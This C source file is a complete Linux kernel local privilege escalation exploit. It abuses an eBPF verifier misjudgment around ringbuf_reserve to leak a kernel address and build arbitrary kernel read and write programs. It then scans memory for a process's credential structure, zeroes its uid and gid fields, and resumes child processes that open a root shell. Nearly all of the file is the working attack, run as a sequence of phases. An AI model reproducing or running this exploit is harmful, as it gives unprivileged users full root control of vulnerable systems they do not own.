#include <signal.h>
#include <sys/prctl.h>
#include <sys/wait.h>

#include "bpf.h"
#include "config.h"
#include "debug.h"
#include "helper.h"

// Shared state handed to every phase function in this file.
typedef struct {
    int comm_fd;       // fd of the BPF_MAP_TYPE_ARRAY map made by create_bpf_maps()
    int ringbuf_fd;    // fd of the BPF_MAP_TYPE_RINGBUF map made by create_bpf_maps()

    int arbitrary_read_prog;   // program fd stored by prepare_arbitrary_rw()
    int arbitrary_write_prog;  // program fd stored by prepare_arbitrary_rw()

    pid_t processes[PROC_NUM]; // pids of the children forked by spawn_processes()

    kaddr_t array_map;  // kernel address recorded by do_leak()
    kaddr_t cred;       // kernel address recorded by find_cred()

    // Scratch buffer. The zero-length members are alternative typed views of
    // the same storage as `bytes` (GNU zero-length-array extension), so
    // e.g. qwords[1] aliases bytes[8..15].
    union {
        u8 bytes[PAGE_SIZE*8];
        u16 words[0];
        u32 dwords[0];
        u64 qwords[0];
        kaddr_t ptrs[0];
    };
} context_t;

// One entry of the phase table executed in order by main().
typedef struct {
    const char* name;               // label printed in progress messages
    int (*func)(context_t *ctx);    // phase body; a non-zero return is treated as an error
    int ignore_error;               // non-zero: run this phase even after an earlier phase failed
} phase_t;

// Create the two BPF maps used by the later phases and record their fds in
// ctx: an array map (ctx->comm_fd) and a ring buffer map (ctx->ringbuf_fd).
//
// Returns 0 on success, or the negative value returned by bpf_create_map()
// for the map that failed. If the ring buffer fails, ctx->comm_fd is
// already set.
int create_bpf_maps(context_t *ctx)
{
    int comm_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(u32), PAGE_SIZE, 1);
    if (comm_fd < 0) {
        WARNF("Failed to create comm map: %d (%s)", comm_fd, strerror(-comm_fd));
        return comm_fd;
    }
    ctx->comm_fd = comm_fd;

    int ringbuf_fd = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, PAGE_SIZE);
    if (ringbuf_fd < 0) {
        WARNF("Could not create ringbuf map: %d (%s)", ringbuf_fd, strerror(-ringbuf_fd));
        return ringbuf_fd;
    }
    ctx->ringbuf_fd = ringbuf_fd;

    return 0;
}

// Load and run a one-shot socket-filter program, then read element 0 of the
// comm map back into ctx->bytes and extract a kernel address from it.
//
// The address is taken from ctx->ptrs[20] with its low byte cleared; it is
// accepted only if its top bits match 0xFFFF8..., and is then stored in
// ctx->array_map.
//
// Returns 0 on success, -1 on any failure (load, run, lookup, or sanity
// check). The program fd is always closed before returning.
int do_leak(context_t *ctx)
{
    int ret = -1;
    struct bpf_insn insn[] = {
        // r9 = r1 (save the program context)
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),

        // r0 = map_lookup_elem(ctx->comm_fd, &key) with key = 0 on the stack
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r8 = r0 (pointer to the map value)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        // r0 = ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // r1 = r0 + 1, computed before the NULL check below
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

        // if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // The verifier believes r0 = 0 and r1 = 0 here; at runtime r0 = 0 and r1 = 1.

        // r7 = r1 + 8
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 8),

        // The verifier believes r7 = 8, but it is actually 9.

        // Store (map value pointer + 0xE0) at fp-8.
        // Original author's note: 0xFFFF..........10 + 0xE0.
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_8),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0xE0),
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8),

        // Partially overwrite the pointer just stored on the stack:
        // r0 = skb_load_bytes_relative(r9, 0, fp-16, r7, 1)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        // r6 = *(u64 *)(fp-8) - 0xE0
        // Original author's note: r6 = 0xFFFF..........00 (off = 0xE0).
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0xE0),

        // map_update_elem(ctx->comm_fd, key = r8, value = r6, flags = 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_8),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_4, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, sizeof(insn) / sizeof(insn[0]), "");
    if (prog < 0) {
        WARNF("Could not load program(do_leak):\n %s", bpf_log_buf);
        goto abort;
    }

    int err = bpf_prog_skb_run(prog, ctx->bytes, 8);

    if (err != 0) {
        WARNF("Could not run program(do_leak): %d (%s)", err, strerror(err));
        goto abort;
    }

    // Copy element 0 of the comm map into the scratch buffer.
    int key = 0;
    err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);
    if (err != 0) {
        WARNF("Could not lookup comm map: %d (%s)", err, strerror(err));
        goto abort;
    }

    // Take the 21st pointer-sized slot and clear its low byte.
    u64 array_map = (u64)ctx->ptrs[20] & (~0xFFL);
    if ((array_map&0xFFFFF00000000000) != 0xFFFF800000000000) {
        WARNF("Could not leak array map: got %p", (kaddr_t)array_map);
        goto abort;
    }

    ctx->array_map = (kaddr_t)array_map;
    DEBUGF("array_map @ %p", ctx->array_map);

    ret = 0;

abort:
    // 0 is a valid descriptor, so only a negative value means "not opened".
    if (prog >= 0) close(prog);
    return ret;
}

// Load the two socket-filter programs used by arbitrary_read() and
// arbitrary_write() and store their fds in ctx->arbitrary_read_prog and
// ctx->arbitrary_write_prog.
//
// Both programs share the same prologue: look up element 0 of the comm map
// (r8), call ringbuf_reserve, then call skb_load_bytes_relative to copy
// packet bytes to fp-16 so that the pointer saved at fp-8 is replaced.
// They differ only in the tail:
//   - read:  *(u64 *)r8 = *(u64 *)r6
//   - write: mode = *(u64 *)(r8 + 0), value = *(u64 *)(r8 + 8);
//            a 64-bit store to r6 when mode == 0, otherwise a 32-bit store.
//
// Returns 0 on success. On failure returns -1, closes any program that was
// already loaded, and leaves ctx untouched.
int prepare_arbitrary_rw(context_t *ctx)
{
    // -1 marks "not loaded"; 0 would be a valid descriptor.
    int arbitrary_read_prog = -1;
    int arbitrary_write_prog = -1;

    struct bpf_insn arbitrary_read[] = {
        // r9 = r1 (save the program context)
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),

        // r0 = map_lookup_elem(ctx->comm_fd, &key) with key = 0 on the stack
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r8 = r0 (pointer to the map value)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        // r0 = ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // r1 = r0 + 1, computed before the NULL check below
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

        // if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // The verifier believes r0 = 0 and r1 = 0 here; at runtime r0 = 0 and r1 = 1.

        // r7 = (r1 + 1) * 8
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 1),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 8),

        // The verifier believes r7 = 8, but it is actually 16.

        // Store the map value pointer at fp-8.
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),

        // Overwrite the pointer just stored on the stack:
        // r0 = skb_load_bytes_relative(r9, 0, fp-16, r7, 1)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        // r6 = the pointer now held at fp-8
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),

        // *(u64 *)r8 = *(u64 *)r6 (publish the value through the comm map)
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, 0),
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    arbitrary_read_prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, arbitrary_read, sizeof(arbitrary_read) / sizeof(arbitrary_read[0]), "");
    if (arbitrary_read_prog < 0) {
        WARNF("Could not load program(arbitrary_read):\n %s", bpf_log_buf);
        goto abort;
    }

    struct bpf_insn arbitrary_write[] = {
        // r9 = r1 (save the program context)
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),

        // r0 = map_lookup_elem(ctx->comm_fd, &key) with key = 0 on the stack
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r8 = r0 (pointer to the map value)
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        // r0 = ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        // r1 = r0 + 1, computed before the NULL check below
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

        // if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // The verifier believes r0 = 0 and r1 = 0 here; at runtime r0 = 0 and r1 = 1.

        // r7 = (r1 + 1) * 8
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 1),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 8),

        // The verifier believes r7 = 8, but it is actually 16.

        // Store the map value pointer at fp-8.
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),

        // Overwrite the pointer just stored on the stack:
        // r0 = skb_load_bytes_relative(r9, 0, fp-16, r7, 1)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        // r6 = the pointer now held at fp-8
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),

        // r0 = width selector, r1 = value; both read from the comm map value
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 8),

        // if (r0 == 0) { *(u64*)r6 = r1 }
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0),
        BPF_JMP_IMM(BPF_JA, 0, 0, 1),
        // else { *(u32*)r6 = r1 }
        BPF_STX_MEM(BPF_W, BPF_REG_6, BPF_REG_1, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    arbitrary_write_prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, arbitrary_write, sizeof(arbitrary_write) / sizeof(arbitrary_write[0]), "");
    if (arbitrary_write_prog < 0) {
        WARNF("Could not load program(arbitrary_write):\n %s", bpf_log_buf);
        goto abort;
    }

    ctx->arbitrary_read_prog = arbitrary_read_prog;
    ctx->arbitrary_write_prog = arbitrary_write_prog;
    return 0;

abort:
    if (arbitrary_read_prog >= 0) close(arbitrary_read_prog);
    if (arbitrary_write_prog >= 0) close(arbitrary_write_prog);
    return -1;
}

// Fork PROC_NUM children and record their pids in ctx->processes.
//
// Each child renames itself to __ID__ via PR_SET_NAME, notes its uid, and
// stops itself with SIGSTOP. Once resumed it re-reads its uid: if that has
// become 0 (and was not 0 before) it runs /bin/sh. The child always exits
// with the uid as its status.
//
// Returns 0 once all children are forked, or the negative fork() result on
// the first failure (children forked so far are left as they are).
int spawn_processes(context_t *ctx)
{
    int idx = 0;

    while (idx < PROC_NUM) {
        pid_t pid = fork();

        if (pid < 0) {
            return pid;
        }

        if (pid == 0) {
            // Child: a failed rename is reported but not fatal.
            if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
                WARNF("Could not set name");
            }

            uid_t uid_before = getuid();
            kill(getpid(), SIGSTOP);
            uid_t uid_after = getuid();

            if (uid_before != uid_after && uid_after == 0) {
                OKF("Enjoy root!");
                system("/bin/sh");
            }
            exit(uid_after);
        }

        // Parent: remember the child and move on to the next slot.
        ctx->processes[idx] = pid;
        idx++;
    }

    return 0;
}

// Run ctx->arbitrary_read_prog with `addr` placed in the first two
// pointer-sized slots of the input buffer, then fetch element 0 of the comm
// map and return its first 64-bit word through *val.
//
// bpf_size is accepted for symmetry with arbitrary_write() but is not used;
// the result is always one 64-bit word.
//
// Returns 0 on success, -1 if the program run or the map lookup fails.
// ctx->bytes is overwritten either way.
int arbitrary_read(context_t *ctx, kaddr_t addr, u64 *val, int bpf_size)
{
    for (int slot = 0; slot < 2; slot++) {
        ctx->ptrs[slot] = addr;
    }

    int rc = bpf_prog_skb_run(ctx->arbitrary_read_prog, ctx->ptrs, 0x100);
    if (rc != 0) {
        WARNF("Could not run program(arbitrary_read): %d (%s)", rc, strerror(rc));
        return -1;
    }

    int index = 0;
    rc = bpf_lookup_elem(ctx->comm_fd, &index, ctx->bytes);
    if (rc != 0) {
        WARNF("Could not lookup comm map: %d (%s)", rc, strerror(rc));
        return -1;
    }

    *val = ctx->qwords[0];
    return 0;
}

// Stage a width selector and `val` in element 0 of the comm map, then run
// ctx->arbitrary_write_prog with `addr` placed in the first two
// pointer-sized slots of the input buffer.
//
// bpf_size selects the store width: BPF_DW stages selector 0 (64-bit
// store); any other value stages selector 1 (32-bit store).
//
// Returns 0 on success, -1 if the map update or the program run fails.
// ctx->bytes is overwritten either way.
int arbitrary_write(context_t *ctx, kaddr_t addr, u64 val, int bpf_size)
{
    // Explicit key for element 0. The result variable is kept separate so
    // the key never depends on what `err` currently holds.
    int key = 0;
    int err = 0;

    ctx->qwords[0] = bpf_size == BPF_DW ? 0 : 1;
    ctx->qwords[1] = val;

    err = bpf_update_elem(ctx->comm_fd, &key, ctx->qwords, 0);
    if (err != 0) {
        WARNF("Could not set up value on program(arbitrary_write): %d (%s)", err, strerror(err));
        return -1;
    }

    // The staging buffer is reused as the program's input data.
    ctx->ptrs[0] = addr;
    ctx->ptrs[1] = addr;

    err = bpf_prog_skb_run(ctx->arbitrary_write_prog, ctx->ptrs, 0x100);
    if (err != 0) {
        WARNF("Could not run program(arbitrary_write): %d (%s)", err, strerror(err));
        return -1;
    }

    return 0;
}

// Scan forward from ctx->array_map + PAGE_SIZE in 8-byte steps, for at most
// PAGE_SIZE*PAGE_SIZE steps, looking for a 64-bit word whose bytes equal the
// first sizeof(u64) bytes of __ID__ (the name the children set with
// PR_SET_NAME in spawn_processes()).
//
// On a match, the word at (match - 0x10 + 8) is read; if that is zero, the
// word at (match - 0x10) is read instead. The first non-zero result is
// stored in ctx->cred.
// NOTE(review): presumably these two slots are the task's credential
// pointers located just before its name field - confirm against the target
// layout.
// NOTE(review): assumes __ID__ is at least 8 bytes long - confirm.
//
// Returns 0 when ctx->cred has been set, -1 if any read fails or the scan
// range is exhausted.
int find_cred(context_t *ctx)
{
    for (int i = 0; i < PAGE_SIZE*PAGE_SIZE ; i++)
    {
        u64 val = 0;
        kaddr_t addr = ctx->array_map + PAGE_SIZE + i*0x8;
        if (arbitrary_read(ctx, addr, &val, BPF_DW) != 0) {
            WARNF("Could not read kernel address %p", addr);
            return -1;
        }

        // DEBUGF("addr %p = 0x%016x", addr, val);

        if (memcmp(&val, __ID__, sizeof(val)) == 0) {
            // Candidate location of the two pointer slots preceding the match.
            kaddr_t cred_from_task = addr - 0x10;

            // Try the second slot first.
            if (arbitrary_read(ctx, cred_from_task + 8, &val, BPF_DW) != 0) {
                WARNF("Could not read kernel address %p + 8", cred_from_task);
                return -1;
            }

            // Fall back to the first slot only when the second one was zero.
            if (val == 0 && arbitrary_read(ctx, cred_from_task, &val, BPF_DW) != 0) {
                WARNF("Could not read kernel address %p + 0", cred_from_task);
                return -1;
            }

            if (val != 0) {
                ctx->cred = (kaddr_t)val;
                DEBUGF("task struct ~ %p", cred_from_task);
                DEBUGF("cred @ %p", ctx->cred);
                return 0;
            }

            // Both slots were zero: keep scanning.

        }
    }

    return -1;
}

// Write a 32-bit zero to four fields of the structure at ctx->cred, in this
// order: uid, gid, euid, egid (offsets given by the OFFSET_*_from_cred
// constants).
//
// Stops at the first failed write. Returns 0 if all four writes succeed,
// -1 otherwise.
int overwrite_cred(context_t *ctx)
{
    // Short-circuit evaluation keeps the original order and stops on the
    // first failure.
    if (arbitrary_write(ctx, ctx->cred + OFFSET_uid_from_cred, 0, BPF_W) != 0 ||
        arbitrary_write(ctx, ctx->cred + OFFSET_gid_from_cred, 0, BPF_W) != 0 ||
        arbitrary_write(ctx, ctx->cred + OFFSET_euid_from_cred, 0, BPF_W) != 0 ||
        arbitrary_write(ctx, ctx->cred + OFFSET_egid_from_cred, 0, BPF_W) != 0) {
        return -1;
    }

    return 0;
}

// Resume every child recorded in ctx->processes with SIGCONT, then block
// until wait() reports no more children (or fails). Always returns 0.
int spawn_root_shell(context_t *ctx)
{
    const pid_t *pid = ctx->processes;
    const pid_t *end = ctx->processes + PROC_NUM;

    for (; pid != end; ++pid) {
        kill(*pid, SIGCONT);
    }

    // Reap children until wait() stops returning a positive pid.
    for (;;) {
        if (wait(NULL) <= 0) {
            break;
        }
    }

    return 0;
}

// Release the descriptors held in ctx and resume any still-stopped process
// in the caller's process group. Always returns 0.
//
// A field still holding 0 is treated as "never assigned": this phase runs
// even when earlier phases were skipped, and closing descriptor 0 would
// close stdin.
int clean_up(context_t *ctx)
{
    const int fds[] = {
        ctx->comm_fd,
        ctx->ringbuf_fd,   // previously never closed
        ctx->arbitrary_read_prog,
        ctx->arbitrary_write_prog,
    };

    for (size_t i = 0; i < sizeof(fds) / sizeof(fds[0]); i++) {
        if (fds[i] > 0) {
            close(fds[i]);
        }
    }

    // pid 0 addresses the whole process group, including this process.
    kill(0, SIGCONT);
    return 0;
}

// Ordered phase table executed by main(). Entries without .ignore_error are
// skipped once any earlier phase has returned non-zero; the final clean-up
// entry sets .ignore_error so it runs regardless.
phase_t phases[] = {
    { .name = "create bpf map(s)", .func = create_bpf_maps },
    { .name = "do some leak", .func = do_leak },
    { .name = "prepare arbitrary rw", .func = prepare_arbitrary_rw },
    { .name = "spawn processes", .func = spawn_processes },
    { .name = "find cred (slow)", .func = find_cred },
    { .name = "overwrite cred", .func = overwrite_cred },
    { .name = "spawn root shell", .func = spawn_root_shell },
    { .name = "clean up the mess", .func = clean_up , .ignore_error = 1 },
};

int main(int argc, char** argv)
{
    context_t ctx = {};
    int err = 0;
    int max = sizeof(phases) / sizeof(phases[0]);
    if (getuid() == 0) {
        BADF("You are already root, exiting...");
        return -1;
    }
    for (int i = 1; i <= max; i++)
    {
        phase_t *phase = &phases[i-1];
        if (err != 0 && !phase->ignore_error) {
            ACTF("phase(%d/%d) '%s' skipped", i, max, phase->name);
            continue;
        }
        ACTF("phase(%d/%d) '%s' running", i, max, phase->name);
        int error = phase->func(&ctx);
        if (error != 0) {
            BADF("phase(%d/%d) '%s' return with error %d", i, max, phase->name, error);
            err = error;
        } else {
            OKF("phase(%d/%d) '%s' done", i, max, phase->name);
        }
    }
    return err;
}